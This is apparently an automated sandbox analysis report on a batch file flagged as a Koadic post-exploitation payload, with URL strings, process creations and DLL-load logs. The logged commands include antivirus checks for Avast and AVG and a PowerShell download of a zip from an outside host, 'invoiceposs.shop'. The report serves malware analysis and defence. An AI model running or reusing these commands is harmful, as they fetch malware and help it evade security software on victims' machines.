Source: 3.8.html.17.drString found in binary or memory: https://peps.python.org/pep-0574/
Source: 3.8.html.17.drString found in binary or memory: https://peps.python.org/pep-0578/
Source: 3.8.html.17.drString found in binary or memory: https://peps.python.org/pep-0586/
Source: 3.8.html.17.dr, init_config.html.17.dr, 3.11.html.17.drString found in binary or memory: https://peps.python.org/pep-0587/
Source: 3.8.html.17.drString found in binary or memory: https://peps.python.org/pep-0589/
Source: 3.8.html.17.dr, 3.11.html.17.drString found in binary or memory: https://peps.python.org/pep-0590/
Source: 3.8.html.17.drString found in binary or memory: https://peps.python.org/pep-0591/
Source: 3.11.html.17.dr, 3.12.html.17.drString found in binary or memory: https://peps.python.org/pep-0594/
Source: general.html.17.drString found in binary or memory: https://peps.python.org/pep-0602/
Source: unicode.html.17.dr, 3.12.html.17.drString found in binary or memory: https://peps.python.org/pep-0623/
Source: 3.11.html.17.drString found in binary or memory: https://peps.python.org/pep-0624/
Source: typeobj.html.17.drString found in binary or memory: https://peps.python.org/pep-0634/
Source: 3.11.html.17.drString found in binary or memory: https://peps.python.org/pep-0657/
Source: 3.11.html.17.drString found in binary or memory: https://peps.python.org/pep-0670/
Source: 3.11.html.17.drString found in binary or memory: https://peps.python.org/pep-0680/
Source: slice.html.17.dr, 3.12.html.17.drString found in binary or memory: https://peps.python.org/pep-0683/
Source: 3.8.html.17.dr, 3.11.html.17.dr, 3.12.html.17.drString found in binary or memory: https://peps.python.org/pep-0706/
Source: 3.1.html.17.drString found in binary or memory: https://peps.python.org/pep-3116/
Source: 3.8.html.17.drString found in binary or memory: https://peps.python.org/pep-3118/
Source: import.html0.17.drString found in binary or memory: https://peps.python.org/pep-3147/
Source: perfmaps.html.17.drString found in binary or memory: https://perf.wiki.kernel.org/index.php/Main_Page
Source: reporter.cpython-312.pyc.17.dr, reporter.py.17.drString found in binary or memory: https://pip.pypa.io/warnings/backtracking
Source: unittest.mock-examples.html.17.drString found in binary or memory: https://pyhamcrest.readthedocs.io/
Source: unittest.mock-examples.html.17.drString found in binary or memory: https://pyhamcrest.readthedocs.io/en/release-1.8/integration/#module-hamcrest.library.integration.ma
Source: whatnow.html.17.dr, venv.html0.17.dr, 2.5.html.17.drString found in binary or memory: https://pypi.org
Source: unittest.mock.html.17.drString found in binary or memory: https://pypi.org/project/mock
Source: introduction.html.17.drString found in binary or memory: https://pythonnet.github.io/
Source: whatnow.html.17.drString found in binary or memory: https://pyvideo.org
Source: 3.1.html.17.drString found in binary or memory: https://pyyaml.org/
Source: floatingpoint.html.17.drString found in binary or memory: https://scipy.org
Source: unix.html0.17.drString found in binary or memory: https://slackbook.org/html/package-management-making-packages.html
Source: core.cpython-312.pyc.17.drString found in binary or memory: https://stackoverflow.com/questions/267399/how-do-you-match-only-valid-roman-numerals-with-a-regular
Source: interactive.html.17.dr, interpreter.html.17.drString found in binary or memory: https://tiswww.case.edu/php/chet/readline/rltop.html
Source: tkinter.ttk.html.17.drString found in binary or memory: https://tktable.sourceforge.net/tile/doc/converting.txt
Source: tkinter.ttk.html.17.drString found in binary or memory: https://tktable.sourceforge.net/tile/tile-tcl2004.pdf
Source: 3.11.html.17.drString found in binary or memory: https://toml.io/
Source: unittest.mock-examples.html.17.drString found in binary or memory: https://twisted.org/documents/11.0.0/api/twisted.python.components.html
Source: unittest.mock.html.17.drString found in binary or memory: https://web.archive.org/web/20200603181648/http://www.voidspace.org.uk/python/weblog/arch_d7_2010_12
Source: general.html.17.drString found in binary or memory: https://wiki.python.org/moin/BeginnersGuide
Source: editors.html.17.drString found in binary or memory: https://wiki.python.org/moin/IntegratedDevelopmentEnvironments
Source: general.html.17.drString found in binary or memory: https://wiki.python.org/moin/PythonBooks
Source: editors.html.17.dr, general.html.17.drString found in binary or memory: https://wiki.python.org/moin/PythonEditors
Source: unittest.mock-examples.html.17.drString found in binary or memory: https://williambert.online/2011/07/how-to-unit-testing-in-django-with-mocking-and-patching/
Source: unix.html0.17.drString found in binary or memory: https://www.debian.org/doc/manuals/maint-guide/first.en.html
Source: xml.etree.elementtree.html.17.drString found in binary or memory: https://www.iana.org/assignments/character-sets/character-sets.xhtml
Source: introduction.html.17.drString found in binary or memory: https://www.jython.org/
Source: general.html.17.drString found in binary or memory: https://www.list.org
Source: unix.html0.17.drString found in binary or memory: https://www.openssl.org/source/openssl-VERSION.tar.gz
Source: introduction.html.17.drString found in binary or memory: https://www.pypy.org/
Source: whatnow.html.17.dr, 3.11.html.17.drString found in binary or memory: https://www.python.org
Source: 3.11.html.17.dr, copyright.html.17.dr, 3.12.html.17.dr, genindex-U.html.17.dr, windows.html1.17.dr, venv.html0.17.dr, urllib.robotparser.html.17.dr, objimpl.html.17.dr, contextvars.html.17.dr, zipfile.html.17.dr, warnings.html.17.dr, genindex-_.html.17.dr, bytearray.html.17.dr, exceptions.html.17.dr, float.html.17.dr, genindex-L.html.17.dr, building.html.17.dr, bytes.html.17.dr, appetite.html.17.dr, turtle.html.17.dr, genindex-T.html.17.drString found in binary or memory: https://www.python.org/
Source: general.html.17.drString found in binary or memory: https://www.python.org/about/success
Source: general.html.17.drString found in binary or memory: https://www.python.org/community/lists/
Source: general.html.17.drString found in binary or memory: https://www.python.org/community/sigs/current/edu-sig
Source: general.html.17.drString found in binary or memory: https://www.python.org/community/workshops/
Source: compatibility_tags.py.17.drString found in binary or memory: https://www.python.org/dev/peps/pep-0571/#backwards-compatibility-with-manylinux1-wheels
Source: compatibility_tags.py.17.drString found in binary or memory: https://www.python.org/dev/peps/pep-0599/#backwards-compatibility-with-manylinux2010-wheels
Source: general.html.17.drString found in binary or memory: https://www.python.org/downloads/
Source: 3.8.html.17.drString found in binary or memory: https://www.python.org/downloads/macos/
Source: unix.html0.17.drString found in binary or memory: https://www.python.org/downloads/source/
Source: general.html.17.drString found in binary or memory: https://www.python.org/psf/
Source: general.html.17.dr, interpreter.html.17.dr, tkinter.ttk.html.17.dr, slice.html.17.dr, long.html.17.dr, whatnow.html.17.dr, xml.etree.elementtree.html.17.dr, unix.html0.17.dr, toplevel_components.html.17.dr, genindex-S.html.17.dr, introduction.html.17.dr, genindex-Symbols.html.17.dr, 3.1.html.17.dr, tkinter.font.html.17.dr, hash.html.17.dr, import.html0.17.dr, unittest.mock-examples.html.17.dr, floatingpoint.html.17.dr, 3.11.html.17.dr, copyright.html.17.dr, 3.12.html.17.drString found in binary or memory: https://www.python.org/psf/donations/
Source: general.html.17.drString found in binary or memory: https://www.python.org/psf/trademarks/
Source: general.html.17.drString found in binary or memory: https://www.redhat.com
Source: general.html.17.dr, interpreter.html.17.dr, tkinter.ttk.html.17.dr, slice.html.17.dr, long.html.17.dr, whatnow.html.17.dr, xml.etree.elementtree.html.17.dr, unix.html0.17.dr, toplevel_components.html.17.dr, genindex-S.html.17.dr, introduction.html.17.dr, genindex-Symbols.html.17.dr, 3.1.html.17.dr, tkinter.font.html.17.dr, hash.html.17.dr, import.html0.17.dr, unittest.mock-examples.html.17.dr, floatingpoint.html.17.dr, 3.11.html.17.dr, copyright.html.17.dr, 3.12.html.17.drString found in binary or memory: https://www.sphinx-doc.org/
Source: general.html.17.drString found in binary or memory: https://www.zope.dev

System Summary

barindex
Source: new.bat, type: SAMPLEMatched rule: Koadic post-exploitation framework BAT payload Author: ditekSHen
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
Source: new.bat, type: SAMPLEMatched rule: MALWARE_BAT_KoadicBAT author = ditekSHen, description = Koadic post-exploitation framework BAT payload
Source: classification engineClassification label: mal72.spre.winBAT@34/1071@0/2
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journalJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4408:120:WilError_03
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile created: C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-11-12 08-30-10-723.logJump to behavior
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\new.bat" "
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;AVASTUI.EXE&apos;
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;AVGUI.EXE&apos;
Source: C:\Windows\System32\cmd.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\new.bat" "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\BPMLNOBVSB.pdf"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 5 REM Wait for PDF to open (adjust timeout as needed)
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq AvastUI.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i "AvastUI.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i "avgui.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://invoiceposs.shop:9005/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }"
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=1544 --field-trial-handle=1512,i,14252116939018401224,568622444743397094,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "try { Expand-Archive -Path 'C:\Users\user\Downloads\downloaded.zip' -DestinationPath 'C:\Users\user\Downloads\Extracted' -Force } catch { exit 1 }"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\BPMLNOBVSB.pdf"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 5 REM Wait for PDF to open (adjust timeout as needed)Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq AvastUI.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i "AvastUI.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i "avgui.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i "AvastUI.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "try { Expand-Archive -Path 'C:\Users\user\Downloads\downloaded.zip' -DestinationPath 'C:\Users\user\Downloads\Extracted' -Force } catch { exit 1 }"Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=1544 --field-trial-handle=1512,i,14252116939018401224,568622444743397094,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: pcacli.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Windows\System32\timeout.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\find.exeSection loaded: ulib.dllJump to behavior
Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\find.exeSection loaded: ulib.dllJump to behavior
Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
